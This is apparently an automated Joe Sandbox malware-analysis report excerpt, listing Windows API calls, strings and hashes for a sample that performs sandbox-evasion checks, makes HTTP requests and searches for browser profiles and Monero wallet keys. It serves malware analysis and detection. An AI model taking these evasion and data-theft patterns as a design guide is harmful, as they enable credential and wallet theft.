                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: 23bdd3a3787ba017bd2151963e9c7a1fe521bbba4362868d8a6d95770fcfb282
                        • Instruction ID: f234d9f61eddc4438df1038df43f24cf153462beb52802c16a8b1b8b1879e236
                        • Opcode Fuzzy Hash: 23bdd3a3787ba017bd2151963e9c7a1fe521bbba4362868d8a6d95770fcfb282
                        • Instruction Fuzzy Hash: 993120709002095ADB08F7F4DC56BEEB778FF55340F108524F226E2196EF709905C6A3

                        Control-flow Graph

                        [Control-flow graph image omitted (legend: Executed / Not Executed); basic blocks span 00861220-0086129D]
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0086123E
                        • __aulldiv.LIBCMT ref: 00861258
                        • __aulldiv.LIBCMT ref: 00861266
                        • ExitProcess.KERNEL32 ref: 00861294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: ffa6505da8649d391e77923fc21b9e7f875cc4cb9c0d9c8f62c07156d207ac82
                        • Instruction ID: b29d3c974897efd884f29ace93f5759afc4bc74184379b0381dd787be9a3865b
                        • Opcode Fuzzy Hash: ffa6505da8649d391e77923fc21b9e7f875cc4cb9c0d9c8f62c07156d207ac82
                        • Instruction Fuzzy Hash: 89014BB0D40308AAEF10DBE4CC49BAEBBB8FB14705F248458E705FA2C1D7749545879A

                        Control-flow Graph

                        [Control-flow graph image omitted (legend: Executed / Not Executed); basic blocks span 00876ABA-00876B22]
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011694E8,?,0088110C,?,00000000,?,00881110,?,00000000,00880AEF), ref: 00876ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00876AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00876AF9
                        • Sleep.KERNEL32(00001770), ref: 00876B04
                        • CloseHandle.KERNEL32(?,00000000,?,011694E8,?,0088110C,?,00000000,?,00881110,?,00000000,00880AEF), ref: 00876B1A
                        • ExitProcess.KERNEL32 ref: 00876B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: e74bb41909cc6272bc76503ef68dba0bf28b32fb6d07a6c94f337058f3f71e9c
                        • Instruction ID: 1cb2a8bc2fda49916c0c39a934d3da915ba64a873385dd3b7f09998bbbf9f3bd
                        • Opcode Fuzzy Hash: e74bb41909cc6272bc76503ef68dba0bf28b32fb6d07a6c94f337058f3f71e9c
                        • Instruction Fuzzy Hash: D6F03A3094461AABE700EBA09C06BBEBA74FB15705F10C514B51AE11C9EBB09541DA67

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00864839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00864849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: 9921ed388d63006035e0fbde341daad4bb494eb4e665a3db02e4d887ad270c01
                        • Instruction ID: 8fb385d09340b670f63eca6772191fb577b7437a26e841d0b7bd07cd1372c46b
                        • Opcode Fuzzy Hash: 9921ed388d63006035e0fbde341daad4bb494eb4e665a3db02e4d887ad270c01
                        • Instruction Fuzzy Hash: 222142B1D00209ABDF14DFA5EC45ADE7774FB45310F108625F525A72D1DB70660ACF92

                        Control-flow Graph

                        APIs
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 00866280: InternetOpenA.WININET(00880DFE,00000001,00000000,00000000,00000000), ref: 008662E1
                          • Part of subcall function 00866280: StrCmpCA.SHLWAPI(?,0116ED88), ref: 00866303
                          • Part of subcall function 00866280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00866335
                          • Part of subcall function 00866280: HttpOpenRequestA.WININET(00000000,GET,?,0116E750,00000000,00000000,00400100,00000000), ref: 00866385
                          • Part of subcall function 00866280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008663BF
                          • Part of subcall function 00866280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008663D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00875228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 2932815453cc85a64824f94d5974d170785930eac6f408f6edc1f94c375ebadb
                        • Instruction ID: bed737a98d5971dde9f0a65c72d6bfbe8df37283a726b52badeb8b8583a69cc4
                        • Opcode Fuzzy Hash: 2932815453cc85a64824f94d5974d170785930eac6f408f6edc1f94c375ebadb
                        • Instruction Fuzzy Hash: 3711CE30910548A6CB18FB68DD969ED7378FF90344F408164A81EDA596EF74AB06C793
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0086112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00861132
                        • ExitProcess.KERNEL32 ref: 00861143
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: a20a433e476b11908636d5a68b9e73b5236566ef2001dd982650c2a9ddec1329
                        • Instruction ID: 56924f615ba341a4dca5a107b64e1f028d128316d6470b8b3a919207cd0dc055
                        • Opcode Fuzzy Hash: a20a433e476b11908636d5a68b9e73b5236566ef2001dd982650c2a9ddec1329
                        • Instruction Fuzzy Hash: FFE08670945308FFEB50ABE09C0EB0D76F8EB05B01F100044F708F61C1C7B42A01D69A
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008610B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 008610F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: abf0fa31c1a7866010918f16ec6827b97e66a8fb968df91eb34e6b9537d9afbb
                        • Instruction ID: ea054f9bfb8a593270d1712ac84a215ca205784cda767264311a617960c5f093
                        • Opcode Fuzzy Hash: abf0fa31c1a7866010918f16ec6827b97e66a8fb968df91eb34e6b9537d9afbb
                        • Instruction Fuzzy Hash: 64F0E271681208BBEB14DAA8AC4DFBBB7E8E705B15F300448FA04E3280D6719E00CAA1
                        APIs
                          • Part of subcall function 008778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00877910
                          • Part of subcall function 008778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00877917
                          • Part of subcall function 008778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0087792F
                          • Part of subcall function 00877850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008611B7), ref: 00877880
                          • Part of subcall function 00877850: RtlAllocateHeap.NTDLL(00000000), ref: 00877887
                          • Part of subcall function 00877850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0087789F
                        • ExitProcess.KERNEL32 ref: 008611C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: c6feab838b2be0cf50104a6b71f40499304580e6de524476dd312959086516cb
                        • Instruction ID: a4cb7d724cfcb59f1aa41cdb959bd715170606d963b91854d9660baddef03f27
                        • Opcode Fuzzy Hash: c6feab838b2be0cf50104a6b71f40499304580e6de524476dd312959086516cb
                        • Instruction Fuzzy Hash: 7CE0ECA595430253CA00B7F8AC0EB2A32DCFB26345F084434FA0DD2556FB29E801C56F
                        APIs
                        • wsprintfA.USER32 ref: 008738CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 008738E3
                        • lstrcat.KERNEL32(?,?), ref: 00873935
                        • StrCmpCA.SHLWAPI(?,00880F70), ref: 00873947
                        • StrCmpCA.SHLWAPI(?,00880F74), ref: 0087395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00873C67
                        • FindClose.KERNEL32(000000FF), ref: 00873C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: 2217a83993ea4f3d5b16aae91cee8af22b463fa0e11cdddc633dc24d0ed717eb
                        • Instruction ID: 92a9734e189a86a1abcc42420d8d1339b32079bf3e04695cf9ebdaa69aab28ed
                        • Opcode Fuzzy Hash: 2217a83993ea4f3d5b16aae91cee8af22b463fa0e11cdddc633dc24d0ed717eb
                        • Instruction Fuzzy Hash: A9A172B19002199BDB64DFA4CC85FEE73B8FB99300F048588A60DD6185EB759B85CF63
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • FindFirstFileA.KERNEL32(00000000,?,00880B32,00880B2B,00000000,?,?,?,008813F4,00880B2A), ref: 0086BEF5
                        • StrCmpCA.SHLWAPI(?,008813F8), ref: 0086BF4D
                        • StrCmpCA.SHLWAPI(?,008813FC), ref: 0086BF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0086C7BF
                        • FindClose.KERNEL32(000000FF), ref: 0086C7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 95f1a7d2c4afa878a60b83d37782357bbdc29796881ccde273d3c0979e2e1243
                        • Instruction ID: 4e63c564993a660b4d17d9c3c59a40df0b7bb7355954794852e00dd10a2fd320
                        • Opcode Fuzzy Hash: 95f1a7d2c4afa878a60b83d37782357bbdc29796881ccde273d3c0979e2e1243
                        • Instruction Fuzzy Hash: C44220729101049BCB18FBB8DD96EEE737DFB94300F408568B91AD6185EF349A49CB93
                        APIs
                        • wsprintfA.USER32 ref: 0087492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 00874943
                        • StrCmpCA.SHLWAPI(?,00880FDC), ref: 00874971
                        • StrCmpCA.SHLWAPI(?,00880FE0), ref: 00874987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00874B7D
                        • FindClose.KERNEL32(000000FF), ref: 00874B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: 24947b0b93c51209620e5f9d0402dffcc39aff4fc7373b3362a25cad64ae5a57
                        • Instruction ID: 2ec927b693910a9e0d0a0e5f2917b7b39f465bf1c17cf38094847d3165624e3f
                        • Opcode Fuzzy Hash: 24947b0b93c51209620e5f9d0402dffcc39aff4fc7373b3362a25cad64ae5a57
                        • Instruction Fuzzy Hash: 2B6174B1500219ABCB64EBE4DC49FEA73BCFB59700F048588A60DD6185EB35DB85CF92
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00874580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00874587
                        • wsprintfA.USER32 ref: 008745A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 008745BD
                        • StrCmpCA.SHLWAPI(?,00880FC4), ref: 008745EB
                        • StrCmpCA.SHLWAPI(?,00880FC8), ref: 00874601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0087468B
                        • FindClose.KERNEL32(000000FF), ref: 008746A0
                        • lstrcat.KERNEL32(?,0116EE98), ref: 008746C5
                        • lstrcat.KERNEL32(?,0116E2D8), ref: 008746D8
                        • lstrlen.KERNEL32(?), ref: 008746E5
                        • lstrlen.KERNEL32(?), ref: 008746F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: 87911bc577efa3a39babd81eafb5d1bf57f86934dc07851b49f04c7b89bceb8c
                        • Instruction ID: dcbfe6f4e58b9a63a17d4504e422c917bb38573f8c8132aa167915259740bfe7
                        • Opcode Fuzzy Hash: 87911bc577efa3a39babd81eafb5d1bf57f86934dc07851b49f04c7b89bceb8c
                        • Instruction Fuzzy Hash: 8B5154B15402199BC764EBB4DC89FEA73BCFB68300F408588B61DD2194EB74DA85CF92
                        APIs
                        • wsprintfA.USER32 ref: 00873EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 00873EDA
                        • StrCmpCA.SHLWAPI(?,00880FAC), ref: 00873F08
                        • StrCmpCA.SHLWAPI(?,00880FB0), ref: 00873F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0087406C
                        • FindClose.KERNEL32(000000FF), ref: 00874081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: a590de9cbaf31706e2c2da58ca28d00e777ae8d7d1a5fa8a14686798b7fcb53f
                        • Instruction ID: b5ea35a1ac4dbed4d117518ac2b856e9881da1d219744e41d34249d4e658178f
